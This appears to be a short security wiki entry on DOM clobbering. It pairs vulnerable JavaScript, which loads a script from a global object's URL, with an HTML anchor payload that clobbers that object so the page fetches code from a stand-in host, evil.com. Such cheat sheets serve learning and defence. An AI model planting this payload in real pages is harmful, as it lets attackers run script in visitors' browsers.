DOM Cloberring
Basic Exploitation
window.onload = function() {
let someObj = window.someObj || {};
let script = document.createElement('script');
script.src = someObj.url;
document.body.appendChild(script);
}<a id=someObj><a id=someObj name=url href=//evil.com/exploit.js>References
Last updated